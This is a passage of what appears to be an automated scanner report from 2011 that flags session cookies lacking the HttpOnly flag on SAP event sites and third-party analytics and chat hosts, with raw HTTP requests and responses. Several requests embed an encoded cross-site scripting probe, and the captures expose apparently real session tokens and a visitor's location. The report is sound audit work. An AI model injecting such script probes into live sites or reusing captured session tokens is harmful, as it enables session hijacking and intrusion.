Set-Cookie: CFID=1211052;expires=Mon, 07-Oct-2041 14:24:21 GMT;path=/
Set-Cookie: CFTOKEN=25795824;expires=Mon, 07-Oct-2041 14:24:21 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:24:21 GMT
Content-Length: 7194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
12.23. http://www.sapevents.com/SAP/SAPPHIRE2010FRANKFURT/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapevents.com
Path:   /SAP/SAPPHIRE2010FRANKFURT/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SAP/SAPPHIRE2010FRANKFURT/index.cfm HTTP/1.1
Host: www.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: https://www.sapevents.com/SAP/SAPPHIRE2010FRANKFURT/index.cfm?
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961168;expires=Mon, 07-Oct-2041 15:04:34 GMT;path=/
Set-Cookie: CFTOKEN=7219bbe32cb8e1c1-081CF062-E8D8-503B-8109120308B43FD8;expires=Mon, 07-Oct-2041 15:04:34 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:04:33 GMT
Connection: close

12.24. http://www.sapevents.com/SAP/WorldTour2011/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapevents.com
Path:   /SAP/WorldTour2011/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SAP/WorldTour2011/index.cfm HTTP/1.1
Host: www.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: landing/index.cfm?passTo=
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961157;expires=Mon, 07-Oct-2041 15:04:29 GMT;path=/
Set-Cookie: CFTOKEN=df1754fbf846e8ef-081CDFDE-FF01-0FB6-C3D34BA75C6EBBAD;expires=Mon, 07-Oct-2041 15:04:29 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:04:29 GMT
Connection: close


<SCRIPT LANGUAGE=JAVASCRIPT TYPE="TEXT/JAVASCRIPT">
<!-- Hide script from old browsers
function optionsWindow(Packages) {
displayWindow = window.open(Packages,'displayWindow','width=65
...[SNIP]...
12.25. http://www.sapteched.com/china/11/cn/index/home.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapteched.com
Path:   /china/11/cn/index/home.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /china/11/cn/index/home.asp HTTP/1.1
Host: www.sapteched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29014
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQSADCD=MBILMGIAFEHOIDHDAECLIHAH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
12.26. http://www.sapteched.com/sapphirenowsaptechedmadrid/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapteched.com
Path:   /sapphirenowsaptechedmadrid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sapphirenowsaptechedmadrid/ HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://teched2011madrid.sapevents.com/index.cfm?fuseaction=email.Redirect&EID=CFE16675750B02
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 11627
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; path=/
Cache-control: private
Content-Length: 11627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAPPHIRE NOW + S
...[SNIP]...
12.27. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
12.28. http://ecohub.sdn.sap.com/irj/ecohub/go/portal/prtroot/docs/hub/uuid/a0002167-ef09-2e10-2bad-9172f36621f6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecohub.sdn.sap.com
Path:   /irj/ecohub/go/portal/prtroot/docs/hub/uuid/a0002167-ef09-2e10-2bad-9172f36621f6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /irj/ecohub/go/portal/prtroot/docs/hub/uuid/a0002167-ef09-2e10-2bad-9172f36621f6 HTTP/1.1
Host: ecohub.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/jpeg
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUQtMTMzMDdGODZENTItOTAyNUI5RkU2QzA4MDY3NA==
SDN_RES_KEY: /hub/uuid/a0002167-ef09-2e10-2bad-9172f36621f6
Content-Length: 14413
Content-Disposition: inline; filename="Vesta%20100%20Pixel%20Logo.jpg"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:41 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE3417400)3417450; Version=1; Path=/; HttpOnly
Set-Cookie: VisitID=QUMxMDY0MUQtMTMzMDdGODZENTItOTAyNUI5RkU2QzA4MDY3NA==; Domain=ecohub.sdn.sap.com; Path=/
Set-Cookie: PortalAlias=ecohub; Path=/
Set-Cookie: JSESSIONID=(J2EE3417400)ID0849690450DB00173539732312452020End; Version=1; Path=/; HttpOnly
Set-Cookie: SDNSTATE=493097132.14340.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2006:11:08 12:30:12.................
...[SNIP]...
12.29. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=05672&profile.geo_gmt_offset=-400&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=vt&profile.geo_region_code=46&profile.geo_city=stowe&profile.geo_city_code=7029&mbox=omniTargetingInfo&mboxId=0&mboxTime=1318668441221&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:03 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 2562
Date: Sat, 15 Oct 2011 13:47:02 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...
12.30. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:20 GMT; Path=/m2/omnituremarketing
Content-Length: 220
Date: Sat, 15 Oct 2011 13:47:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
12.31. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:08 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1042
Date: Sat, 15 Oct 2011 13:47:08 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-st
...[SNIP]...
12.32. http://reservoir.marketstudio.net/reservoir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:39 GMT
Server: Apache
X-Server-Name: resweb@dc1web53
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:39 GMT
Location: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer
...[SNIP]...
12.33. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Set-Cookie: LivePersonID=-546022977410-1318690536:-1:-1:-1:-1; expires=Sun, 14-Oct-2012 14:55:47 GMT; path=/hc/37021986; domain=.liveperson.net
Location: https://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

12.34. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/37021986/?&visitor=546022977410&msessionkey=449600187523043155&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=377409746548-795272279105&protV=20&lpjson=1&id=8140355572&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C%23chat-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic1%7C%23chat-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic2%7C%23chat-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic3%7C%23voice-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic1%7C%23voice-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic2%7C%23voice-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic3%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:55:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=449600187523043155; path=/hc/37021986
Set-Cookie: HumanClickKEY=449600187523043155; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:55:36 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 42266

lpConnLib.Process({"ResultSet": {"lpCallId":"377409746548-795272279105","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
12.35. http://sales.liveperson.net/hc/37021986/cmd/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/cmd/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/37021986/cmd/url/?site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!click-query-name=voice-sales-sap-general-us-en-1&SV!click-query-room=voice-sales-sap-general-us-en-1&SV!click-query-state=Available&SV!click-query-channel=voice&page=http%3A//sales.liveperson.net/hc/37021986/%3Fcmd%3Dfile%26file%3DvisitorWantsToTalk%26site%3D37021986%26visitor%3D546022977410%26msessionkey%3D449600187523043155%26SV%21EngageRoom%3Dsales-sap-general-us-en%26SV%21chat-button-name%3Dvoice-sales-sap-general-us-en-1%26SV%21chat-button-room%3Dvoice-sales-sap-general-us-en-1%26referrer%3D%28button%2520dynamic-button%3Avoice-sales-sap-general-us-en-1%28SAP%2520Business%2520Management%2520Software%2520Solutions%252C%2520Applications%2520and%2520Services%2520%257C%2520SAP%29%29%2520http%253A//www.sap.com/index.epx&id=8140355572&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1318690564635 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
